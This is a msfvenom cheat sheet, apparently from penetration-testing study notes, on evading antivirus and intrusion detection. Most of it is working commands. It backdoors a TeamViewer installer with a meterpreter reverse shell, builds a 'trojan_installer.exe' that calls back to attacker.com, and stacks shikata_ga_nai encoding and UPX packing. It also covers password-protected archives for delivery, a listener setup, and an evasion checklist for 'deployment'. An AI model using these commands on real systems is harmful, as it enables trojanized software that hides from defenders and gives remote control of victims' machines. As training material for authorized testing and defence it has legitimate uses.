msfvenom cheat sheet

Protection Types

Type	Description
Endpoint Protection	Localized software protecting single hosts (AV, antimalware, firewall, anti-DDoS)
Perimeter Protection	Physical/virtual devices on network edge (firewalls, IDS/IPS)
DMZ	De-Militarized Zone for public-facing servers with moderate trust level

Detection Methods

Method	Description
Signature-based	Pattern matching against known attack signatures (100% match triggers alarm)
Heuristic/Anomaly	Behavioral comparison against established baseline
Stateful Protocol Analysis	Comparing protocol events against accepted definitions
SOC Live Monitoring	Human analysts monitoring network activity in real-time

msfvenom Evasion Commands

Backdoored Executable Template

msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 \
  -k -x ~/Downloads/TeamViewer_Setup.exe \
  -e x86/shikata_ga_nai -a x86 --platform windows \
  -o ~/Desktop/TeamViewer_Setup.exe -i 5

Key Flags

Flag	Description
`-k`	Keep original executable functionality (run payload in separate thread)
`-x <file>`	Use executable as template
`-e <encoder>`	Specify encoder (e.g., `x86/shikata_ga_nai`)
`-i <count>`	Number of encoding iterations
`-a <arch>`	Architecture (x86, x64)
`--platform`	Target platform (windows, linux)
`-f <format>`	Output format (exe, elf, raw, js, etc.)
`-o <file>`	Output file path

Generate Encoded Payload

msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 \
  -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5

VirusTotal Analysis

msf-virustotal -k <API_key> -f payload.exe

Archive Evasion

Password-protected archives bypass many AV signatures but may generate “unable to scan” alerts.

# Create password-protected archive
zip -e -P secretpass payload.zip payload.exe
7z a -pSecretPass payload.7z payload.exe

Popular Packers

Packer	Description
UPX	Universal executable packer
The Enigma Protector	Windows executable protection
MPRESS	PE/ELF/Mach-O packer
Themida	Advanced code protection
MEW	Minimal executable packer
ExeStealth	Anti-debugging protection
Morphine	Polymorphic packer

UPX Example

# Pack executable
upx -9 payload.exe -o packed_payload.exe

# Unpack (for analysis)
upx -d packed_payload.exe

Common Encoders

Encoder	Rank	Description
`x86/shikata_ga_nai`	Excellent	Polymorphic XOR Additive Feedback
`x64/xor`	Manual	Simple XOR encoder
`x64/zutto_dekiru`	Manual	Zutto Dekiru encoder
`x86/alpha_mixed`	Low	Alphanumeric mixedcase
`x86/unicode_mixed`	Low	Unicode mixedcase

Exploit Code Randomization

When writing exploit code, add offset randomization to break IDS signatures:

'Targets' =>
[
 [ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29, 'Offset' => 5093 } ],
],

MSF6 AES Encryption

MSF6 supports AES-encrypted communication for Meterpreter sessions:

# Meterpreter runs in memory with encrypted tunnel
set payload windows/x64/meterpreter/reverse_https
set EnableStageEncoding true
set StageEncoder x64/xor

Quick Reference

Generate Stealthy Payload

# Backdoored installer with encoding
msfvenom -p windows/meterpreter/reverse_https LHOST=attacker.com LPORT=443 \
  -x legit_installer.exe -k \
  -e x86/shikata_ga_nai -i 10 \
  -f exe -o trojan_installer.exe

Handler Setup for Encrypted Session

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set EnableStageEncoding true
run -j

Evasion Checklist

Use executable templates (-x flag)
Enable -k for legitimate functionality
Apply multiple encoding iterations
Consider using packers
Use password-protected archives for delivery
Leverage HTTPS/encrypted channels
Randomize exploit offsets
Avoid obvious NOP sleds
Test against sandbox before deployment

References

US Government Post-Mortem Report on Equifax Hack
Protecting from DNS Exfiltration
PolyPack Project
Metasploit - The Penetration Tester’s Guide (No Starch Press)

Keyboard shortcuts

notebook